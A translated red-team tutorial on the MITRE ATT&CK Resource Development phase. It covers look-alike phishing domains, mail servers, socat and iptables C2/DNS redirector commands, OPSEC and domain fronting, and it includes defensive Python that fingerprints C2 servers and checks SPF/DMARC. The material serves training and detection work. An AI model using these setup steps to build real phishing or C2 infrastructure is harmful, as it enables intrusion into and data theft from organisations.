Welcome to part two of the MITRE ATT&CK tutorial series. To watch the video, use the link below:

In the previous part we saw what information TAs (threat actors) look for and the methods they use to obtain it, and we introduced several well-known tools in that area. After any information gathering, and before the operation starts, the prerequisites of the operation have to be put in place. TAs build and configure their attack infrastructure specifically for each operation. Does every attack really differ from the next? Yes: based on the information gathered in the reconnaissance phase, APT groups buy servers in a specific location and a domain for the specific target. Why? So that when they exfiltrate the organization's data, it flows to a domain that draws less attention and stays off the blue team's radar. A more important reason is that initial access needs a phishing infrastructure, whose first requirement is a domain resembling the target's domain; and, more importantly still, before the operation they must wait until that domain has been active for at least 2 to 3 months before launching the phishing campaign.

Sometimes, to break into a specific target, TAs buy information about that target's employees; they may buy initial access, or even a username and password, which brings up the topic of insider attacks, but this is rare.

TAs also sometimes browse leaked emails and usernames of the target organization's employees and managers on the dark web or deep web and buy credentials there; LAP$u$, for example, used this method.

APT groups, and red teamers too, need infrastructure to carry out their operations. Their infrastructure includes the following:

  1. A mail server for sending phishing
  2. Various payloads for initial access and execution
  3. A C2 server set up for different purposes
  4. Redirectors in front of the mail server and the C2, so the real server is not exposed and access and web traffic are not lost
  5. Buying a VPS
  6. Buying a domain
  7. Buying extra IP addresses
  8. And so on (exploits, buying initial access, ...)

Diagram text: Resource Development (Domain, VPS, Mail Server); Weaponized Payloads; Social engineering to deliver the payload; Exploit a system to gain access; Cobalt Strike, Covenant, Metasploit

The image below shows a basic red teaming infrastructure:

Source:

https://github.com/bluscreenofjeff/Red-Team-Infrastructure-WiKi


Domains:

Every operation needs a domain dedicated to it. Why?

expireddomains.net

Web categorization

If you need to self-categorize domains, you can use any of these sites:

http://sitereview.bluecoat.com/sitereview.jsp

https://domain.opendns.com

List of expired domains

https://www.expireddomains.net/

https://talosintelligence.com/reputation_center

https://postmaster.google.com/u/0/managedomains

https://www.barracudacentral.org/lookups

https://sitelookup.mcafee.com/

Resource for checking expired sites and how many archived snapshots a site has

https://www.similarweb.com

Resources for obtaining a domain resembling the target's domains, so that detecting the exfiltration of data becomes harder, and for checking their reputation:

https://github.com/threatexpress/domainhunter

https://github.com/t94j0/AIRMASTER

https://github.com/Mr-Un1k0d3r/CatMyPhish

https://github.com/mdsecactivebreach/Chameleon

https://dnschecker.org

Categorization and Blacklist Checking Resources

https://trustedsource.org/en/feedback/url?action=checksingle

http://www.fortiguard.com/iprep

http://sitereview.bluecoat.com/sitereview.jsp

https://www.checkpoint.com/urlcat/main.htm

https://urlfiltering.paloaltonetworks.com/

https://secure2.sophos.com/en-us/support/contact-support.aspx

https://global.sitesafety.trendmicro.com/

http://www.brightcloud.com/tools/url-ip-lookup.php

http://csi.websense.com/

https://archive.lightspeedsystems.com/


https://www.senderbase.org/

http://multirbl.valli.org/

https://mxtoolbox.com/blacklists.aspx

Setting up the phishing infrastructure:

http://www.iredmail.org/download.html

https://docs.iredmail.org/setup.dns.html

https://www.unlocktheinbox.com/dmarcwizard/

Phishing Frameworks

https://github.com/gophish/gophish

https://github.com/pentestgeek/phishing-frenzy

https://github.com/trustedsec/social-engineer-toolkit

https://github.com/Raikia/FiercePhish

Redirectors:

socat udp4-recvfrom:53,reuseaddr,fork udp4-sendto:<IPADDRESS>; echo -ne

iptables (the same DNS redirect done with NAT rules; each command is one line, and the option is --dport with two dashes):

iptables -I INPUT -p udp -m udp --dport 53 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination <IP-GOES-HERE>:53
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1

DNS

To check whether the mail server configuration is correct, or where the problem is, use this site:

https://mxtoolbox.com/

Important note:

APTs and red teamers observe OPSEC.

What is OPSEC?

Operational security means observing the security practices that keep a red teaming operation from being exposed. These practices range from correctly configuring the C2, redirectors, mail server and so on, to leaving no footprints in the target organization's network, because every direct contact between the red team and the organization, whether a command run, a file touched or a process started, raises the chance that the attack is detected and blocked.

A red team operation is successful when, like the APT being emulated, it can extract organizational information, documents and databases from the organization without being detected. For that, the infrastructure designed at the start of the engagement has to be suitable. Buying servers from AWS, Azure, Linode, ...

Using a VPN server

Changing the default Kali Linux hostname

Changing the Kali Linux browser User-Agent; otherwise you are fully identifiable!

Preventing browser leaks

DNS leaks, IP leaks

How do you get detected through a port, a service banner or the default certificate file?

All Cobalt Strike servers

https://www.shodan.io/search?query=product%3A%22Cobalt+Strike+Beacon%22

Default port: tcp 50050

Cobalt Strike DNS listener responds with 0.0.0.0

Metasploit servers

https://www.shodan.io/search?query=ssl%3A%22MetasploitSelfSignedCA%22

Covenant servers

https://www.shodan.io/search?query=ssl%3A%E2%80%9DCovenant%E2%80%9D%20http.component%3A%E2%80%9DBlazor%E2%80%9D

Mythic servers

https://www.shodan.io/search?query=ssl%3AMythic+port%3A7443

Brute Ratel servers

https://www.shodan.io/search?query=http.html_hash%3A-1957161625

DeimosC2 servers

https://www.shodan.io/search?query=http.html_hash%3A-14029177

Sliver C2 servers

https://www.shodan.io/search?query=ssl.jarm%3A3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910+%22HTTP%2F1.1+404+Not+Found%22+%22Cache-Control%3A+no-store%2C+no-cache%2C+must-revalidate%22+%22Content-Length%3A+0%22&page=3

https://www.shodan.io/search/facet?query=ssl%3Amultiplayer+ssl%3Aoperators&facet=ssl.jarm

https://www.shodan.io/search?query=ssl%3A%22P18055077%22

GoPhish servers

https://search.censys.io/search/report?resource=hosts&q=services.jarm.fingerprint%3A+28d28d28d00028d00041d28d28d41dd279b0cf765af27fa62e66d7c8281124&virtual_hosts=EXCLUDE&field=ip&num_buckets=1000
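A defender-side triage of the indicators the queries above key on, written for this page (not code from the original post or from any of the frameworks named): it matches constructed scan observations against the default port, certificate names, JARM values, html_hash values and HTTP response details listed above. The ScanRecord field names and the sample records are this example's own assumptions.

```python
"""Triage TLS/HTTP scan records with the C2 indicators listed on this page.

Offline illustration: RECORDS below are constructed, not real scan output.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Indicator values copied from the Shodan/Censys queries on this page.
COBALTSTRIKE_DEFAULT_PORT = 50050           # team server default port
SLIVER_JARM = "3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910"
GOPHISH_JARM = "28d28d28d00028d00041d28d28d41dd279b0cf765af27fa62e66d7c8281124"
BRUTE_RATEL_HTML_HASH = -1957161625         # Shodan http.html_hash value
DEIMOSC2_HTML_HASH = -14029177


@dataclass
class ScanRecord:
    """One host:port observation; the field names are this example's assumption."""
    host: str
    port: int
    cert_issuer: str = ""
    cert_subject: str = ""
    jarm: str = ""
    http_status: str = ""
    http_headers: Dict[str, str] = field(default_factory=dict)
    html_hash: Optional[int] = None
    http_component: str = ""


def _header(rec: ScanRecord, name: str) -> str:
    """Case-insensitive header lookup, value lower-cased for comparison."""
    for key, value in rec.http_headers.items():
        if key.lower() == name.lower():
            return value.lower()
    return ""


def fingerprint(rec: ScanRecord) -> List[str]:
    """Return the framework labels whose page indicators the record satisfies."""
    hits = []
    cert = (rec.cert_issuer + " " + rec.cert_subject).lower()
    if rec.port == COBALTSTRIKE_DEFAULT_PORT:
        hits.append("cobaltstrike-teamserver-port")
    if "metasploitselfsignedca" in cert:
        hits.append("metasploit")
    if "covenant" in cert and rec.http_component.lower() == "blazor":
        hits.append("covenant")
    if "mythic" in cert and rec.port == 7443:
        hits.append("mythic")
    if rec.html_hash == BRUTE_RATEL_HTML_HASH:
        hits.append("brute-ratel")
    if rec.html_hash == DEIMOSC2_HTML_HASH:
        hits.append("deimosc2")
    # The page's Sliver query pairs the JARM with the bare 404 response;
    # a JARM value on its own is too weak, so all conditions are required.
    if (rec.jarm == SLIVER_JARM
            and rec.http_status.startswith("HTTP/1.1 404")
            and "no-store, no-cache, must-revalidate" in _header(rec, "Cache-Control")
            and _header(rec, "Content-Length") == "0"):
        hits.append("sliver")
    if rec.jarm == GOPHISH_JARM:
        hits.append("gophish")
    return hits


def triage(records: List[ScanRecord]) -> Dict[str, List[str]]:
    """Map "host:port" to its labels for every record with at least one hit."""
    out = {}
    for rec in records:
        labels = fingerprint(rec)
        if labels:
            out[f"{rec.host}:{rec.port}"] = labels
    return out


# Constructed observations on RFC 5737 documentation addresses.
RECORDS = [
    ScanRecord("192.0.2.10", 50050),
    ScanRecord("192.0.2.11", 443, cert_issuer="CN=MetasploitSelfSignedCA"),
    ScanRecord("192.0.2.12", 7443, cert_subject="CN=Mythic"),
    ScanRecord("192.0.2.13", 443, jarm=SLIVER_JARM, http_status="HTTP/1.1 404 Not Found",
               http_headers={"Cache-Control": "no-store, no-cache, must-revalidate",
                             "Content-Length": "0"}),
    ScanRecord("192.0.2.14", 443, jarm=SLIVER_JARM, http_status="HTTP/1.1 200 OK"),
    ScanRecord("192.0.2.15", 443, cert_subject="CN=www.example.com",
               http_status="HTTP/1.1 200 OK"),
]

if __name__ == "__main__":
    for key, labels in triage(RECORDS).items():
        print(key, labels)
```

Every rule here is an operator-default fingerprint; a team server with a changed port, a proper certificate and a non-default landing page matches none of them, which is exactly the OPSEC point the section makes.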

Domain Fronting

Using CDNs has helped RTs and TAs make the detection process far more complicated than before. Imagine using the Cloudflare CDN to communicate with the victim: by default CDN traffic is treated as acceptable by security systems, and working out whether that traffic is connected to a C2 server behind the scenes is a complicated job.

In practice you rely on SNI: the SNI of your packet is what determines that, after passing through cloudflare, it should reach your C2 server.
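The detection counterpart of the technique just described, added here as an example that is not part of the original post: classic domain fronting sends an innocuous CDN-hosted name in the TLS SNI while the HTTP Host header names the real backend, so a TLS-inspecting proxy can flag sessions where the two disagree. The log format, the last-two-labels approximation of the registrable domain and the sample lines are this example's own assumptions.

```python
"""Flag HTTPS sessions whose TLS SNI and HTTP Host disagree (domain fronting).

Offline illustration over constructed proxy log lines. A proxy only sees the
Host header when it terminates TLS; without inspection only the SNI is visible.
"""
import re
from collections import Counter

# Constructed log format: "<ts> <client_ip> sni=<name> host=<name> dst=<ip>".
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) sni=(?P<sni>\S*) host=(?P<host>\S*) dst=(?P<dst>\S+)$"
)


def registrable(name):
    """Approximate eTLD+1 with the last two labels (assumption: no public-suffix list)."""
    labels = name.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else name.lower()


def parse_line(line):
    """Return the fields of one log line, or None when it does not match the format."""
    match = LOG_RE.match(line.strip())
    return match.groupdict() if match else None


def is_fronted(entry):
    """True when SNI and Host are both present and belong to different registrable domains."""
    sni, host = entry["sni"], entry["host"].split(":")[0]  # drop :port from Host
    if not sni or not host:
        return False  # nothing to compare; a missing SNI is a separate anomaly
    return registrable(sni) != registrable(host)


def detect(lines):
    """Return (alerts, counters): alerts are (client, sni, host) triples that mismatch."""
    alerts, counts = [], Counter()
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            counts["unparsed"] += 1
            continue
        counts["parsed"] += 1
        if is_fronted(entry):
            alerts.append((entry["client"], entry["sni"], entry["host"]))
            counts["fronted"] += 1
    return alerts, counts


# Constructed sample lines (RFC 5737 addresses, example.* names).
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z 10.0.0.5 sni=cdn.example.net host=cdn.example.net dst=198.51.100.1",
    "2024-01-01T10:00:01Z 10.0.0.5 sni=static.example.net host=www.example.net dst=198.51.100.1",
    "2024-01-01T10:00:02Z 10.0.0.7 sni=cdn.example.net host=c2-front.example.org:443 dst=198.51.100.1",
    "2024-01-01T10:00:03Z 10.0.0.9 sni= host=update.example.com dst=198.51.100.2",
    "garbage line",
]

if __name__ == "__main__":
    found, stats = detect(SAMPLE_LOG)
    print(found, dict(stats))
```

The second sample line shares a registrable domain across SNI and Host and is not flagged, which is why the comparison is done on the registrable domain rather than the full hostname.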

SMTP Server Setup

Using disposable mail to send phishing

Setting up a mail server and configuring the DNS records -> PTR, SPF, DKIM, DMARC

PTR: resolves an IP address to its associated hostname

Sender Policy Framework (SPF) records validate that the sending server (MAIL FROM) is authorized to send email for the associated email domain

They determine whether an email comes from a trusted server

DomainKeys Identified Mail (DKIM) is used by the mail server to digitally sign a mail message and its contents so that the receiving servers can confirm that the message really originates from that mail server

Domain-based Message Authentication, Reporting and Conformance (DMARC) checks whether a message has DKIM and SPF entries and specifies the actions to take if they don't exist.
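How a receiving server actually applies the SPF and DMARC records described above, as an added example that is not part of the original post: it evaluates a sending IP against constructed SPF records (including the include: chain and the RFC 7208 ten-lookup limit that turns an include loop into permerror) and then applies the p= policy from a constructed DMARC record. The ZONE dict stands in for real DNS TXT lookups; a, mx, exists, macros and DMARC alignment rules are deliberately left out.

```python
"""Offline SPF/DMARC evaluation against constructed DNS TXT records."""
import ipaddress

# Constructed sample zone (not real records): DNS name -> TXT string.
ZONE = {
    "example.com": "v=spf1 ip4:203.0.113.0/24 include:_spf.mailer.example -all",
    "_spf.mailer.example": "v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 ~all",
    "_dmarc.example.com": "v=DMARC1; p=reject; rua=mailto:dmarc@example.com; pct=100",
    "loop.example": "v=spf1 include:loop.example -all",  # pathological self-include
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
MAX_LOOKUPS = 10  # RFC 7208 limit on DNS-querying mechanisms per evaluation


def lookup_txt(name, zone=ZONE):
    """Stand-in for a DNS TXT query; returns None when the name has no record."""
    return zone.get(name.lower())


def _ip_in(ip, network):
    """True when ip falls inside network; a v4/v6 mismatch is simply False."""
    return ipaddress.ip_address(ip) in ipaddress.ip_network(network, strict=False)


def spf_check(ip, domain, zone=ZONE, _lookups=None):
    """Return pass/fail/softfail/neutral/none/permerror for ip sending as domain.

    Supports ip4, ip6, include, redirect= and all; a, mx, exists and macros
    are left out of this illustration.
    """
    if _lookups is None:
        _lookups = [0]  # shared counter across the whole include/redirect chain
    record = lookup_txt(domain, zone)
    if record is None or not record.lower().startswith("v=spf1"):
        return "none"
    redirect = None
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()
        if name in ("ip4", "ip6"):
            if _ip_in(ip, arg):
                return QUALIFIERS[qualifier]
        elif name == "include":
            _lookups[0] += 1
            if _lookups[0] > MAX_LOOKUPS:
                return "permerror"
            sub = spf_check(ip, arg, zone, _lookups)
            if sub == "permerror":
                return "permerror"
            if sub == "pass":  # include only matches when the included record passes
                return QUALIFIERS[qualifier]
        elif name == "all":
            return QUALIFIERS[qualifier]
        elif name.startswith("redirect="):
            redirect = name.split("=", 1)[1]
    if redirect:
        _lookups[0] += 1
        if _lookups[0] > MAX_LOOKUPS:
            return "permerror"
        return spf_check(ip, redirect, zone, _lookups)
    return "neutral"  # nothing matched and no all/redirect present


def parse_dmarc(domain, zone=ZONE):
    """Parse _dmarc.<domain> into a tag dict; {} when absent or not v=DMARC1."""
    record = lookup_txt(f"_dmarc.{domain}", zone)
    if record is None:
        return {}
    tags = {}
    for part in record.split(";"):
        key, _, value = part.strip().partition("=")
        if key:
            tags[key.strip().lower()] = value.strip()
    return tags if tags.get("v", "").upper() == "DMARC1" else {}


def dmarc_disposition(domain, spf_result, dkim_pass, zone=ZONE):
    """Apply p= when neither SPF nor DKIM passes; assumes the From: domain aligns."""
    tags = parse_dmarc(domain, zone)
    if not tags:
        return "none"  # no DMARC record: the receiver applies no policy
    if spf_result == "pass" or dkim_pass:
        return "accept"
    return tags.get("p", "none")  # none / quarantine / reject


if __name__ == "__main__":
    for sender in ("203.0.113.7", "198.51.100.10", "192.0.2.1"):
        result = spf_check(sender, "example.com")
        print(sender, result, dmarc_disposition("example.com", result, False))
```

A phishing domain with no DMARC record at all ends in "none", which is why a freshly bought look-alike domain still gets delivered; the receiving side only rejects when the spoofed domain's owner publishes p=reject.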

Check your purchased domain's reputation

https://www.ipvoid.com/dns-reputation

https://www.zerobounce.net/services/dmarc-generator.html


https://docs.iredmail.org/setup.dns.html

ATT&CK – Resource Development (TA0042)

The adversary is trying to establish resources they can use to support operations.

Resource Development consists of techniques that involve adversaries creating, purchasing, or compromising/stealing resources that can be used to support targeting. Such resources include infrastructure, accounts, or capabilities. These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using purchased domains to support Command and Control, email accounts for phishing as a part of Initial Access, or stealing code signing certificates to help with Defense Evasion.

Buying a VPS and a domain, or using hacked servers or domains

Acquire Infrastructure T1583 [Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Additionally, botnets are available for rent or purchase.]

    Domains [Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.]

    DNS Server [Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: Application Layer Protocol). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.]

    Virtual Private Server [Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.]

    Server [Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party Server or renting a Virtual Private Server, adversaries may opt to configure and run their own servers in support of operations.]

If their intent is destruction, renting a botnet panel.

Botnet [Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks. Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale Phishing or Distributed Denial of Service (DDoS).]

To communicate with the victim over C2 and issue commands, TAs may place the commands on a specific blog, on Twitter or on Google Drive; this is done to avoid detection and bypass detection mechanisms.

Web Services [Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control (Web Service) or Exfiltration Over Web Service. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.]

Another method available to TAs is that, with nothing more than an email address, they can get access to cloud servers; it is enough to bring up a web app there and place the C2 commands on it (software as a service, SaaS).

    Serverless [Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.]

Using hacked accounts on the organization's portal to continue the social engineering and abuse the trust between employee and organization

Compromise Accounts T1586 [Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. Establish Accounts), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.]

Using hacked social media accounts to continue the social engineering and abuse the trust between employee and organization

    Social Media Accounts [Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. Social Media Accounts), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.]

Using hacked email accounts to continue the social engineering and abuse the trust between employee and organization

    Email Accounts [Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct Phishing for Information or Phishing. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: Domains).]

Using cloud services belonging to organizational accounts to exfiltrate data

    Cloud Accounts [Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for Exfiltration to Cloud Storage or to Upload Tools. Cloud accounts can also be used in the acquisition of infrastructure, such as Virtual Private Servers or Serverless infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.]

While TAs can buy or rent servers, they may also use old hacked servers as their infrastructure for C2 or for exfiltration.

Compromise Infrastructure T1584 [Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle. Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.]

The same is done with stolen domains, by changing the domain's registration details.

    Domains [Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant. Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.]

    DNS Server [Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: Application Layer Protocol). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.]

    Virtual Private Server [Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.]

    Server [Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a Server or Virtual Private Server, adversaries may compromise third-party servers in support of operations.]

    Botnet [Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks. Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale Phishing or Distributed Denial of Service (DDoS).]

    Web Services [Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user’s access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control (Web Service) or Exfiltration Over Web Service. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.]

    Serverless [Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.]

Preparing malware to steal credentials and documents

Develop Capabilities T1587 [Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.]

    Malware [Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.]

    Code Signing Certificates [Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with. Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is.]

Very often, when a large organization's network is breached, some of its sensitive information and resources lead to breaches of other organizations or companies. One such case is the certificate files of upstream organizations: the subsidiaries trust them, and they get reused in other operations.

    Digital Certificates [Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).]

In the previous phase we said that all of the organization's assets are assessed by the TAs, so they know exactly which hardware, software and operating systems, in which versions, exist in the target organization; depending on the version, if it is vulnerable, they obtain a public or private exploit for it. Keep in mind that most attacks use relatively new public exploits that the organization has not yet patched.

Exploits [Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits. Adversaries may use information acquired via Vulnerabilities to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.]

Creating a developer persona to break into the organization

Establish Accounts T1585 [Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.]

Creating social media accounts with a fabricated persona

    Social Media Accounts [Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.]

    Email Accounts [Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct Phishing for Information or Phishing. Adversaries may also take steps to cultivate a persona around the email account, such as through use of Social Media Accounts, to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: Domains).]

Creating various cloud accounts for use in exfiltration

    Cloud Accounts [Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for Exfiltration to Cloud Storage or to Upload Tools. Cloud accounts can also be used in the acquisition of infrastructure, such as Virtual Private Servers or Serverless infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.]

Preparing the tools and payloads before the attack begins, and testing them

Obtain Capabilities T1588 [Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.]

    Malware [Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.]

    Tool [Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: PsExec). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as Cobalt Strike. Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.]

    Code Signing Certificates [Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with. Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is.]

    Digital Certificates [Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.]

    Exploits [Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.]

    Vulnerabilities [Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.]

Stage Capabilities T1608 [Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed (Develop Capabilities) or obtained (Obtain Capabilities) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary (Acquire Infrastructure) or was otherwise compromised by them (Compromise Infrastructure). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.]

    Upload Malware [Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable Ingress Tool Transfer by placing it on an Internet accessible web server.]

    Upload Tool [Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: PsExec). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable Ingress Tool Transfer by placing it on an Internet accessible web server.]

